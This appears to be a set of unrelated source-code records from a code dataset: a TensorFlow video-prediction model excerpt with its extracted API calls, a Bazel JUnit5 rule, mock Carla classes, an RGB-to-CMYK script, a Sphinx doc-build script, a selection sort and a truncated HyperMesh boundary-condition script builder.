color_channels: the number of color channels in the images. Returns: List of images transformed by the predicted CDNA kernels. """ batch_size = int(cdna_input.get_shape()[0]) height = int(prev_image.get_shape()[1]) width = int(prev_image.get_shape()[2]) # Predict kernels using linear function of last hidden layer. cdna_kerns = slim.layers.fully_connected( cdna_input, DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks, scope='cdna_params', activation_fn=None) # Reshape and normalize. cdna_kerns = tf.reshape( cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]) cdna_kerns = tf.nn.relu(cdna_kerns - RELU_SHIFT) + RELU_SHIFT norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True) cdna_kerns /= norm_factor # Treat the color channel dimension as the batch dimension since the same # transformation is applied to each color channel. # Treat the batch dimension as the channel dimension so that # depthwise_conv2d can apply a different transformation to each sample. cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3]) cdna_kerns = tf.reshape(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks]) # Swap the batch and channel dimensions. prev_image = tf.transpose(prev_image, [3, 1, 2, 0]) # Transform image. transformed = tf.nn.depthwise_conv2d(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME') # Transpose the dimensions to where they belong. transformed = tf.reshape(transformed, [color_channels, height, width, batch_size, num_masks]) transformed = tf.transpose(transformed, [3, 1, 2, 0, 4]) transformed = tf.unstack(transformed, axis=-1) return transformed def dna_transformation(prev_image, dna_input): """Apply dynamic neural advection to previous image. Args: prev_image: previous image to be transformed. dna_input: hidden lyaer to be used for computing DNA transformation. Returns: List of images transformed by the predicted CDNA kernels. """ # Construct translated images. prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]]) image_height = int(prev_image.get_shape()[1]) image_width = int(prev_image.get_shape()[2]) inputs = [] for xkern in range(DNA_KERN_SIZE): for ykern in range(DNA_KERN_SIZE): inputs.append( tf.expand_dims( tf.slice(prev_image_pad, [0, xkern, ykern, 0], [-1, image_height, image_width, -1]), [3])) inputs = tf.concat(axis=3, values=inputs) # Normalize channels to 1. kernel = tf.nn.relu(dna_input - RELU_SHIFT) + RELU_SHIFT kernel = tf.expand_dims( kernel / tf.reduce_sum( kernel, [3], keep_dims=True), [4]) return tf.reduce_sum(kernel * inputs, [3], keep_dims=False) def scheduled_sample(ground_truth_x, generated_x, batch_size, num_ground_truth): """Sample batch with specified mix of ground truth and generated data points. Args: ground_truth_x: tensor of ground-truth data points. generated_x: tensor of generated data points. batch_size: batch size num_ground_truth: number of ground-truth examples to include in batch. Returns: New batch with num_ground_truth sampled from ground_truth_x and the rest from generated_x. """ idx = tf.random_shuffle(tf.range(int(batch_size))) ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth)) generated_idx = tf.gather(idx, tf.range(num_ground_truth, int(batch_size))) ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx) generated_examps = tf.gather(generated_x, generated_idx) return tf.dynamic_stitch([ground_truth_idx, generated_idx], [ground_truth_examps, generated_examps])
[((14752, 14879), 'tensorflow.contrib.slim.layers.fully_connected', 'slim.layers.fully_connected', (['cdna_input', '(DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks)'], {'scope': '"""cdna_params"""', 'activation_fn': 'None'}), "(cdna_input, DNA_KERN_SIZE * DNA_KERN_SIZE *\n num_masks, scope='cdna_params', activation_fn=None)\n", (14779, 14879), True, 'import tensorflow.contrib.slim as slim\n'), ((14944, 15029), 'tensorflow.reshape', 'tf.reshape', (['cdna_kerns', '[batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]'], {}), '(cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks]\n )\n', (14954, 15029), True, 'import tensorflow as tf\n'), ((15112, 15164), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['cdna_kerns', '[1, 2, 3]'], {'keep_dims': '(True)'}), '(cdna_kerns, [1, 2, 3], keep_dims=True)\n', (15125, 15164), True, 'import tensorflow as tf\n'), ((15475, 15516), 'tensorflow.transpose', 'tf.transpose', (['cdna_kerns', '[1, 2, 0, 4, 3]'], {}), '(cdna_kerns, [1, 2, 0, 4, 3])\n', (15487, 15516), True, 'import tensorflow as tf\n'), ((15532, 15609), 'tensorflow.reshape', 'tf.reshape', (['cdna_kerns', '[DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks]'], {}), '(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])\n', (15542, 15609), True, 'import tensorflow as tf\n'), ((15668, 15706), 'tensorflow.transpose', 'tf.transpose', (['prev_image', '[3, 1, 2, 0]'], {}), '(prev_image, [3, 1, 2, 0])\n', (15680, 15706), True, 'import tensorflow as tf\n'), ((15745, 15813), 'tensorflow.nn.depthwise_conv2d', 'tf.nn.depthwise_conv2d', (['prev_image', 'cdna_kerns', '[1, 1, 1, 1]', '"""SAME"""'], {}), "(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')\n", (15767, 15813), True, 'import tensorflow as tf\n'), ((15882, 15961), 'tensorflow.reshape', 'tf.reshape', (['transformed', '[color_channels, height, width, batch_size, num_masks]'], {}), '(transformed, [color_channels, height, width, batch_size, num_masks])\n', (15892, 15961), True, 'import tensorflow as tf\n'), ((15978, 16020), 'tensorflow.transpose', 'tf.transpose', (['transformed', '[3, 1, 2, 0, 4]'], {}), '(transformed, [3, 1, 2, 0, 4])\n', (15990, 16020), True, 'import tensorflow as tf\n'), ((16037, 16069), 'tensorflow.unstack', 'tf.unstack', (['transformed'], {'axis': '(-1)'}), '(transformed, axis=-1)\n', (16047, 16069), True, 'import tensorflow as tf\n'), ((16458, 16510), 'tensorflow.pad', 'tf.pad', (['prev_image', '[[0, 0], [2, 2], [2, 2], [0, 0]]'], {}), '(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])\n', (16464, 16510), True, 'import tensorflow as tf\n'), ((16883, 16915), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': 'inputs'}), '(axis=3, values=inputs)\n', (16892, 16915), True, 'import tensorflow as tf\n'), ((17116, 17168), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['(kernel * inputs)', '[3]'], {'keep_dims': '(False)'}), '(kernel * inputs, [3], keep_dims=False)\n', (17129, 17168), True, 'import tensorflow as tf\n'), ((17885, 17928), 'tensorflow.gather', 'tf.gather', (['ground_truth_x', 'ground_truth_idx'], {}), '(ground_truth_x, ground_truth_idx)\n', (17894, 17928), True, 'import tensorflow as tf\n'), ((17950, 17987), 'tensorflow.gather', 'tf.gather', (['generated_x', 'generated_idx'], {}), '(generated_x, generated_idx)\n', (17959, 17987), True, 'import tensorflow as tf\n'), ((17997, 18094), 'tensorflow.dynamic_stitch', 'tf.dynamic_stitch', (['[ground_truth_idx, generated_idx]', '[ground_truth_examps, generated_examps]'], {}), '([ground_truth_idx, generated_idx], [ground_truth_examps,\n 
generated_examps])\n', (18014, 18094), True, 'import tensorflow as tf\n'), ((2297, 2339), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[slim.conv2d]'], {'reuse': '(False)'}), '([slim.conv2d], reuse=False)\n', (2311, 2339), True, 'import tensorflow.contrib.slim as slim\n'), ((2362, 2382), 'tensorflow.concat', 'tf.concat', (['images', '(3)'], {}), '(images, 3)\n', (2371, 2382), True, 'import tensorflow as tf\n'), ((2402, 2562), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['stacked_images', '(32)', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_conv1"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm1'}"}), "(stacked_images, 32, [3, 3], stride=2, scope='latent_conv1',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm1'})\n", (2413, 2562), True, 'import tensorflow.contrib.slim as slim\n'), ((2623, 2780), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc1', '(64)', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_conv2"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm2'}"}), "(latent_enc1, 64, [3, 3], stride=2, scope='latent_conv2',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm2'})\n", (2634, 2780), True, 'import tensorflow.contrib.slim as slim\n'), ((2841, 2998), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc2', '(64)', '[3, 3]'], {'stride': '(1)', 'scope': '"""latent_conv3"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm3'}"}), "(latent_enc2, 64, [3, 3], stride=1, scope='latent_conv3',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm3'})\n", (2852, 2998), True, 'import tensorflow.contrib.slim as slim\n'), ((3059, 3259), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc3', 'FLAGS.latent_channels', '[3, 3]'], {'stride': '(2)', 'activation_fn': 'None', 'scope': '"""latent_mean"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm_mean'}"}), "(latent_enc3, FLAGS.latent_channels, [3, 3], stride=2,\n activation_fn=None, scope='latent_mean', normalizer_fn=tf_layers.\n layer_norm, normalizer_params={'scope': 'latent_norm_mean'})\n", (3070, 3259), True, 'import tensorflow.contrib.slim as slim\n'), ((3326, 3505), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc3', 'FLAGS.latent_channels', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_std"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_std_norm'}"}), "(latent_enc3, FLAGS.latent_channels, [3, 3], stride=2, scope=\n 'latent_std', normalizer_fn=tf_layers.layer_norm, normalizer_params={\n 'scope': 'latent_std_norm'})\n", (3337, 3505), True, 'import tensorflow.contrib.slim as slim\n'), ((3660, 3686), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['divergence'], {}), '(divergence)\n', (3674, 3686), True, 'import tensorflow as tf\n'), ((3769, 3862), 'tensorflow.random_normal', 'tf.random_normal', (['([FLAGS.sequence_length - 1] + latent_mean.shape)', '(0)', '(1)'], {'dtype': 'tf.float32'}), '([FLAGS.sequence_length - 1] + latent_mean.shape, 0, 1,\n dtype=tf.float32)\n', (3785, 3862), True, 'import tensorflow as tf\n'), ((3927, 3986), 'tensorflow.random_normal', 'tf.random_normal', (['latent_mean.shape', '(0)', '(1)'], {'dtype': 'tf.float32'}), '(latent_mean.shape, 0, 1, dtype=tf.float32)\n', (3943, 3986), True, 'import tensorflow as tf\n'), ((5811, 5829), 'tensorflow.identity', 'tf.identity', 
(['image'], {}), '(image)\n', (5822, 5829), True, 'import tensorflow as tf\n'), ((6488, 6527), 'numpy.array', 'np.array', (['[32, 32, 64, 64, 128, 64, 32]'], {}), '([32, 32, 64, 64, 128, 64, 32])\n', (6496, 6527), True, 'import numpy as np\n'), ((13722, 13774), 'numpy.array', 'np.array', (['[1.0, 0.0, 0.0, 0.0, 1.0, 0.0]', 'np.float32'], {}), '([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32)\n', (13730, 13774), True, 'import numpy as np\n'), ((15047, 15082), 'tensorflow.nn.relu', 'tf.nn.relu', (['(cdna_kerns - RELU_SHIFT)'], {}), '(cdna_kerns - RELU_SHIFT)\n', (15057, 15082), True, 'import tensorflow as tf\n'), ((16957, 16991), 'tensorflow.nn.relu', 'tf.nn.relu', (['(dna_input - RELU_SHIFT)'], {}), '(dna_input - RELU_SHIFT)\n', (16967, 16991), True, 'import tensorflow as tf\n'), ((17754, 17780), 'tensorflow.range', 'tf.range', (['num_ground_truth'], {}), '(num_ground_truth)\n', (17762, 17780), True, 'import tensorflow as tf\n'), ((7085, 7230), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[lstm_func, slim.layers.conv2d, slim.layers.fully_connected, tf_layers.\n layer_norm, slim.layers.conv2d_transpose]'], {'reuse': 'reuse'}), '([lstm_func, slim.layers.conv2d, slim.layers.fully_connected,\n tf_layers.layer_norm, slim.layers.conv2d_transpose], reuse=reuse)\n', (7099, 7230), True, 'import tensorflow.contrib.slim as slim\n'), ((7696, 7745), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(1)', 'values': '[action, current_state]'}), '(axis=1, values=[action, current_state])\n', (7705, 7745), True, 'import tensorflow as tf\n'), ((7760, 7922), 'tensorflow.contrib.slim.layers.conv2d', 'slim.layers.conv2d', (['prev_image', '(32)', '[5, 5]'], {'stride': '(2)', 'scope': '"""scale1_conv1"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'layer_norm1'}"}), "(prev_image, 32, [5, 5], stride=2, scope='scale1_conv1',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'layer_norm1'})\n", (7778, 7922), True, 'import tensorflow.contrib.slim as slim\n'), ((8092, 8142), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden1'], {'scope': '"""layer_norm2"""'}), "(hidden1, scope='layer_norm2')\n", (8112, 8142), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8261, 8311), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden2'], {'scope': '"""layer_norm3"""'}), "(hidden2, scope='layer_norm3')\n", (8281, 8311), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8537, 8587), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden3'], {'scope': '"""layer_norm4"""'}), "(hidden3, scope='layer_norm4')\n", (8557, 8587), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8706, 8756), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden4'], {'scope': '"""layer_norm5"""'}), "(hidden4, scope='layer_norm5')\n", (8726, 8756), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((9935, 9985), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden5'], {'scope': '"""layer_norm6"""'}), "(hidden5, scope='layer_norm6')\n", (9955, 9985), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10226, 10276), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden6'], {'scope': '"""layer_norm7"""'}), "(hidden6, scope='layer_norm7')\n", (10246, 10276), 
True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10318, 10359), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[hidden6, enc1]'}), '(axis=3, values=[hidden6, enc1])\n', (10327, 10359), True, 'import tensorflow as tf\n'), ((10614, 10664), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden7'], {'scope': '"""layer_norm8"""'}), "(hidden7, scope='layer_norm8')\n", (10634, 10664), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10707, 10748), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[hidden7, enc0]'}), '(axis=3, values=[hidden7, enc0])\n', (10716, 10748), True, 'import tensorflow as tf\n'), ((12360, 12463), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', '(num_masks + 1)', '(1)'], {'stride': '(1)', 'scope': '"""convt7"""', 'activation_fn': 'None'}), "(enc6, num_masks + 1, 1, stride=1, scope=\n 'convt7', activation_fn=None)\n", (12388, 12463), True, 'import tensorflow.contrib.slim as slim\n'), ((12656, 12719), 'tensorflow.split', 'tf.split', ([], {'axis': '(3)', 'num_or_size_splits': '(num_masks + 1)', 'value': 'masks'}), '(axis=3, num_or_size_splits=num_masks + 1, value=masks)\n', (12664, 12719), True, 'import tensorflow as tf\n'), ((13990, 14021), 'spatial_transformer.transformer', 'transformer', (['prev_image', 'params'], {}), '(prev_image, params)\n', (14001, 14021), False, 'from spatial_transformer import transformer\n'), ((17047, 17089), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['kernel', '[3]'], {'keep_dims': '(True)'}), '(kernel, [3], keep_dims=True)\n', (17060, 17089), True, 'import tensorflow as tf\n'), ((1452, 1469), 'tensorflow.exp', 'tf.exp', (['log_sigma'], {}), '(log_sigma)\n', (1458, 1469), True, 'import tensorflow as tf\n'), ((9155, 9194), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[enc2, smear]'}), '(axis=3, values=[enc2, smear])\n', (9164, 9194), True, 'import tensorflow as tf\n'), ((11112, 11220), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', '(DNA_KERN_SIZE ** 2)', '(1)'], {'stride': '(1)', 'scope': '"""convt4"""', 'activation_fn': 'None'}), "(enc6, DNA_KERN_SIZE ** 2, 1, stride=1, scope=\n 'convt4', activation_fn=None)\n", (11140, 11220), True, 'import tensorflow.contrib.slim as slim\n'), ((11325, 11429), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', 'color_channels', '(1)'], {'stride': '(1)', 'scope': '"""convt4"""', 'activation_fn': 'None'}), "(enc6, color_channels, 1, stride=1, scope=\n 'convt4', activation_fn=None)\n", (11353, 11429), True, 'import tensorflow.contrib.slim as slim\n'), ((11728, 11788), 'tensorflow.contrib.slim.layers.fully_connected', 'slim.layers.fully_connected', (['stp_input0', '(100)'], {'scope': '"""fc_stp"""'}), "(stp_input0, 100, scope='fc_stp')\n", (11755, 11788), True, 'import tensorflow.contrib.slim as slim\n'), ((1436, 1449), 'tensorflow.square', 'tf.square', (['mu'], {}), '(mu)\n', (1445, 1449), True, 'import tensorflow as tf\n'), ((6349, 6372), 'tensorflow.to_float', 'tf.to_float', (['batch_size'], {}), '(batch_size)\n', (6360, 6372), True, 'import tensorflow as tf\n'), ((9611, 9644), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[latent]'], {}), '([latent])\n', (9634, 9644), True, 'import tensorflow as tf\n'), ((9663, 9691), 'tensorflow.concat', 'tf.concat', (['[enc2, latent]', '(3)'], {}), '([enc2, latent], 3)\n', (9672, 
9691), True, 'import tensorflow as tf\n'), ((11607, 11626), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['enc7'], {}), '(enc7)\n', (11620, 11626), True, 'import tensorflow as tf\n'), ((12520, 12558), 'tensorflow.reshape', 'tf.reshape', (['masks', '[-1, num_masks + 1]'], {}), '(masks, [-1, num_masks + 1])\n', (12530, 12558), True, 'import tensorflow as tf\n'), ((16758, 16845), 'tensorflow.slice', 'tf.slice', (['prev_image_pad', '[0, xkern, ykern, 0]', '[-1, image_height, image_width, -1]'], {}), '(prev_image_pad, [0, xkern, ykern, 0], [-1, image_height,\n image_width, -1])\n', (16766, 16845), True, 'import tensorflow as tf\n'), ((6385, 6405), 'tensorflow.exp', 'tf.exp', (['(iter_num / k)'], {}), '(iter_num / k)\n', (6391, 6405), True, 'import tensorflow as tf\n'), ((9493, 9512), 'tensorflow.identity', 'tf.identity', (['latent'], {}), '(latent)\n', (9504, 9512), True, 'import tensorflow as tf\n'), ((9563, 9587), 'tensorflow.exp', 'tf.exp', (['(latent_std / 2.0)'], {}), '(latent_std / 2.0)\n', (9569, 9587), True, 'import tensorflow as tf\n')]
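For illustration, the scheduled sampling described in the construct_model docstring above feeds the network roughly batch_size * k / (k + exp(iter_num / k)) ground-truth frames per step. A minimal NumPy sketch of that schedule (the function and variable names here are hypothetical, not taken from the source above):

import numpy as np

def scheduled_sampling_count(batch_size, iter_num, k):
    # k < 0 is treated as "always feed back the model's own predictions".
    if k < 0:
        return 0
    # Inverse-sigmoid decay: close to batch_size early in training, approaching 0 later.
    frac = k / (k + np.exp(iter_num / k))
    return int(round(batch_size * frac))

for it in (0, 5000, 20000):
    print(it, scheduled_sampling_count(32, it, k=900.0))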
prashantsharma04/bazel_java_rules
junit5/rules.bzl
4f80fbe70e1778aa8e3e0ee8aa2f1efc3e44a462
load("@rules_jvm_external//:defs.bzl", "artifact") # For more information see # - https://github.com/bmuschko/bazel-examples/blob/master/java/junit5-test/BUILD # - https://github.com/salesforce/bazel-maven-proxy/tree/master/tools/junit5 # - https://github.com/junit-team/junit5-samples/tree/master/junit5-jupiter-starter-bazel def junit5_test(name, srcs, test_package, resources = [], deps = [], runtime_deps = [], **kwargs): """JUnit runner macro""" FILTER_KWARGS = [ "main_class", "use_testrunner", "args", ] for arg in FILTER_KWARGS: if arg in kwargs.keys(): kwargs.pop(arg) junit_console_args = [] if test_package: junit_console_args += ["--select-package", test_package] else: fail("must specify 'test_package'") native.java_test( name = name, srcs = srcs, use_testrunner = False, main_class = "org.junit.platform.console.ConsoleLauncher", args = junit_console_args, deps = deps + [ artifact("org.junit.jupiter:junit-jupiter-api"), artifact("org.junit.jupiter:junit-jupiter-params"), artifact("org.junit.jupiter:junit-jupiter-engine"), artifact("org.hamcrest:hamcrest-library"), artifact("org.hamcrest:hamcrest-core"), artifact("org.hamcrest:hamcrest"), artifact("org.mockito:mockito-core"), ], visibility = ["//java:__subpackages__"], resources = resources, runtime_deps = runtime_deps + [ artifact("org.junit.platform:junit-platform-console"), ], **kwargs )
[]
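For illustration, the junit5_test macro defined in rules.bzl above would typically be invoked from a consuming BUILD file roughly as follows (Starlark; the load label and target names are hypothetical and depend on the workspace layout):

load("//junit5:rules.bzl", "junit5_test")

junit5_test(
    name = "calculator_test",
    srcs = glob(["src/test/java/**/*.java"]),
    test_package = "com.example.calculator",
    deps = ["//java/com/example/calculator"],
)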
fangedward/pylot
tests/mocked_carla.py
a742b3789ee8e7fa2d692ae22bda1e2960ed9345
# This module provides mocked versions of classes and functions provided
# by Carla in our runtime environment.


class Location(object):
    """ A mock class for carla.Location. """

    def __init__(self, x, y, z):
        self.x = x
        self.y = y
        self.z = z


class Rotation(object):
    """ A mock class for carla.Rotation. """

    def __init__(self, pitch, yaw, roll):
        self.pitch = pitch
        self.yaw = yaw
        self.roll = roll


class Vector3D(object):
    """ A mock class for carla.Vector3D. """

    def __init__(self, x, y, z):
        self.x = x
        self.y = y
        self.z = z
[]
Zweizack/fuzzy-rainbow
rgb_to_cmyk.py
f69f7eb59971d28a9093a03c1911b41e23cddf2a
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

ee = '\033[1m'
green = '\033[32m'
yellow = '\033[33m'
cyan = '\033[36m'

line = cyan+'-' * 0x2D
print(ee+line)

R,G,B = [float(X) / 0xFF for X in input(f'{yellow}RGB: {green}').split()]

K = 1-max(R,G,B)
C,M,Y = [round(float((1-X-K)/(1-K) * 0x64),1) for X in [R,G,B]]
K = round(K * 0x64,1)

print(f'{yellow}CMYK: {green}{C}%, {M}%, {Y}%, {K}%')
print(line)
[]
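The conversion above computes K = 1 - max(R, G, B) and C, M, Y = (1 - X - K) / (1 - K), which divides by zero for pure black input (R = G = B = 0). A guarded, reusable sketch of the same formula (the function name and return convention are assumptions, not part of the original script):

def rgb_to_cmyk(r, g, b):
    # Channels come in as 0..255 and are scaled to 0..1 first.
    r, g, b = (x / 255 for x in (r, g, b))
    k = 1 - max(r, g, b)
    if k == 1:
        # Pure black: C, M and Y are conventionally 0; avoid dividing by zero.
        return 0.0, 0.0, 0.0, 100.0
    c, m, y = ((1 - x - k) / (1 - k) * 100 for x in (r, g, b))
    return round(c, 1), round(m, 1), round(y, 1), round(k * 100, 1)

print(rgb_to_cmyk(255, 99, 71))  # roughly (0.0, 61.2, 72.2, 0.0)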
JukeboxPipeline/jukedj
docs/updatedoc.py
d4159961c819c26792a278981ee68106ee15f3f3
#!/usr/bin/env python """Builds the documentaion. First it runs gendoc to create rst files for the source code. Then it runs sphinx make. .. Warning:: This will delete the content of the output directory first! So you might loose data. You can use updatedoc.py -nod. Usage, just call:: updatedoc.py -h """ import argparse import os import shutil import sys import gendoc thisdir = os.path.abspath(os.path.dirname(__file__)) def setup_argparse(): """Sets up the argument parser and returns it :returns: the parser :rtype: :class:`argparse.ArgumentParser` :raises: None """ parser = argparse.ArgumentParser( description="Builds the documentaion. First it runs gendoc to create rst files\ for the source code. Then it runs sphinx make.\ WARNING: this will delete the contents of the output dirs. You can use -nod.") ipath = os.path.join(thisdir, '../src') ipath = os.path.abspath(ipath) idefault = [ipath] parser.add_argument('-i', '--input', nargs='+', default=idefault, help='list of input directories. gendoc is called for every\ source dir.\ Default is \'%s\'.' % ', '.join(idefault)) opath = os.path.join(thisdir, 'reference') opath = os.path.abspath(opath) odefault = [opath] parser.add_argument('-o', '--output', nargs='+', default=odefault, help='list of output directories. if you have multiple source\ directories, the corresponding output directorie is used.\ if there are less dirs than for source, the last output dir\ is used for the remaining source dirs.\ WARNING: the output directories are emptied by default. See -nod.\ Default is \'%s\'.' % ', '.join(odefault)) gadefault = ['-T', '-f', '-e', '-o'] parser.add_argument('-ga', '--gendocargs', nargs='*', default=gadefault, help="list of arguments to pass to gendoc. use -gh for info.\ Default is \'%s\'" % ', '.join(gadefault)) parser.add_argument('-nod', '--nodelete', action='store_true', help='Do not empty the output directories first.') parser.add_argument('-gh', '--gendochelp', action='store_true', help='print the help for gendoc and exit') return parser def prepare_dir(directory, delete=True): """Create apidoc dir, delete contents if delete is True. :param directory: the apidoc directory. you can use relative paths here :type directory: str :param delete: if True, deletes the contents of apidoc. This acts like an override switch. :type delete: bool :returns: None :rtype: None :raises: None """ if os.path.exists(directory): if delete: assert directory != thisdir, 'Trying to delete docs! Specify other output dir!' print 'Deleting %s' % directory shutil.rmtree(directory) print 'Creating %s' % directory os.mkdir(directory) else: print 'Creating %s' % directory os.mkdir(directory) def run_gendoc(source, dest, args): """Starts gendoc which reads source and creates rst files in dest with the given args. :param source: The python source directory for gendoc. Can be a relative path. :type source: str :param dest: The destination for the rst files. Can be a relative path. :type dest: str :param args: Arguments for gendoc. See gendoc for more information. :type args: list :returns: None :rtype: None :raises: SystemExit """ args.insert(0, 'gendoc.py') args.append(dest) args.append(source) print 'Running gendoc.main with: %s' % args gendoc.main(args) def main(argv=sys.argv[1:]): """Parse commandline arguments and run the tool :param argv: the commandline arguments. 
:type argv: list :returns: None :rtype: None :raises: None """ parser = setup_argparse() args = parser.parse_args(argv) if args.gendochelp: sys.argv[0] = 'gendoc.py' genparser = gendoc.setup_parser() genparser.print_help() sys.exit(0) print 'Preparing output directories' print '='*80 for odir in args.output: prepare_dir(odir, not args.nodelete) print '\nRunning gendoc' print '='*80 for i, idir in enumerate(args.input): if i >= len(args.output): odir = args.output[-1] else: odir = args.output[i] run_gendoc(idir, odir, args.gendocargs) if __name__ == '__main__': main()
[]
vitormrts/sorting-algorithms
sort/selectionsort.py
5571ce522a7fd33f976fa05b264ed2c253c221b3
def selection_sort(A): # O(n^2)
    n = len(A)
    for i in range(n-1): # traverse the list
        min = i
        for j in range(i+1, n): # find the smallest element of the list starting at i + 1
            if A[j] < A[min]:
                min = j
        A[i], A[min] = A[min], A[i] # place the element in its correct position
    return A

# 1 + (n-1)*[3 + X] = 1 + 3*(n-1) + X*(n-1) = 1 + 3*(n-1) + (n^2 + n - 2)/2
# = (1 - 3 - 1) + (3n + n/2) + (n^2/2)
# The complexity is O(n^2)
[]
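The closing comments above sketch the operation count behind the O(n^2) bound; concretely, the inner comparison loop runs (n-1) + (n-2) + ... + 1 = n*(n-1)/2 times. A small instrumented sketch of the same algorithm (an illustration, not the original file) that checks this closed form:

def selection_sort_counting(A):
    # Same algorithm, but counting how many comparisons the inner loop makes.
    comparisons = 0
    n = len(A)
    for i in range(n - 1):
        smallest = i
        for j in range(i + 1, n):
            comparisons += 1
            if A[j] < A[smallest]:
                smallest = j
        A[i], A[smallest] = A[smallest], A[i]
    return A, comparisons

data = [5, 3, 8, 1, 9, 2]
_, count = selection_sort_counting(data)
assert count == 6 * (6 - 1) // 2  # 15 comparisons for n = 6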
manuel1618/bridgeOptimizer
BridgeOptimizer/scriptBuilder/ScriptBuilderBoundaryConditions.py
273bbf27b2c6273e4aaca55debbd9a10bebf7042
import os from typing import List, Tuple from BridgeOptimizer.datastructure.hypermesh.LoadCollector import LoadCollector from BridgeOptimizer.datastructure.hypermesh.LoadStep import LoadStep from BridgeOptimizer.datastructure.hypermesh.Force import Force from BridgeOptimizer.datastructure.hypermesh.SPC import SPC class ScriptBuilderBoundaryConditions: """ Extra class for generating Loadstep, Loadcollectors, Forces and Constraints Parameters: --------- None """ def __init__(self) -> None: pass def write_tcl_commands_loadCollectors(self, tcl_commands: List) -> None: """ Creates all the load collectors (has to be done before creating loadsteps, as the loadcollectors are referenced) """ load_collector: LoadCollector = None # create all load collectors and loads first for load_collector in LoadCollector.instances: load_collector_type = load_collector.get_load_collector_type() load_collector.name = f"{str(load_collector_type.__name__)}_{str(load_collector.get_id())}" tcl_commands.append( f"*createentity loadcols includeid=0 name=\"{load_collector.name}\"") # create loads for load in load_collector.loads: if load_collector_type == Force: force: Force = load tcl_commands.append( f"*createmark nodes 1 {' '.join([str(x) for x in force.nodeIds])}") tcl_commands.append( f"*loadcreateonentity_curve nodes 1 1 1 {force.x} {force.y} {force.z} 0 {force.x} {force.y} {force.z} 0 0 0 0") elif load_collector_type == SPC: spc: SPC = load tcl_commands.append( f"*createmark nodes 1 {' '.join([str(x) for x in spc.nodeIds])}") tcl_commands.append( f"*loadcreateonentity_curve nodes 1 3 1 {spc.dofs[0]} {spc.dofs[1]} {spc.dofs[2]} {spc.dofs[3]} {spc.dofs[4]} {spc.dofs[5]} 